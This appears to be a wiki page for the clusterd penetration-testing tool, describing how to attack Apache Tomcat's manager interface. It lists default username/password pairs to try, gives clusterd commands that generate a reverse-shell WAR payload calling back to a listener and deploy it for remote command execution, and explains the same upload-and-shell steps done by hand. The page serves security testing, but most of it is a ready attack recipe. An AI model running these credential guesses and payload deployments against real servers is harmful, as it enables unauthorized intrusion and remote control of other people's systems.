Skip to content
Stephen Breen edited this page May 7, 2014 · 2 revisions

The Tomcat application server can be attacked through the management interface. This is usually found at the URL /manager/ or /manager/html on port 8080. We attack Tomcat through known or easily guessable credentials on the management interface. Various levels of insecure defaults can be found in different versions of Tomcat with a trend toward becoming more secure in later versions.

Default Credentials

Some credentials to try on the Tomcat manager interface include the following:

tomcat/s3cret
tomcat/tomcat
admin/admin
tomcat/admin
admin/tomcat
admin/password
tomcat/password
admin/
tomcat/

Note that the username does not HAVE to be "admin" or "tomcat" but usually is, this is what most configuration guides use.

Clusterd usage

If access can be gained to the Tomcat administrative interface, it is trivial to achieve remote command execution (assuming your account has the correct permissions). Again, clusterd can automate this process:

sudo python clusterd.py -o linux -i localhost -p 8080 -a tomcat --usr-auth tomcat:s3cret --deploy shell3.war --deployer manage_deploy --invoke

Note that in the above, shell3.war was generated using the clusterd command:

sudo python clusterd.py -o windows -a tomcat --gen-payload 127.0.0.1:4444

Manually getting a shell

To perform this same attack manually is trivial. Simply access the manager interface at http://<host>:8080/manager/html. Scroll down to the "Deploy" section. It offers a function that allows for upload of a WAR file. Once uploaded, simply start the new service, and your reverse shell will be obtained.

Clone this wiki locally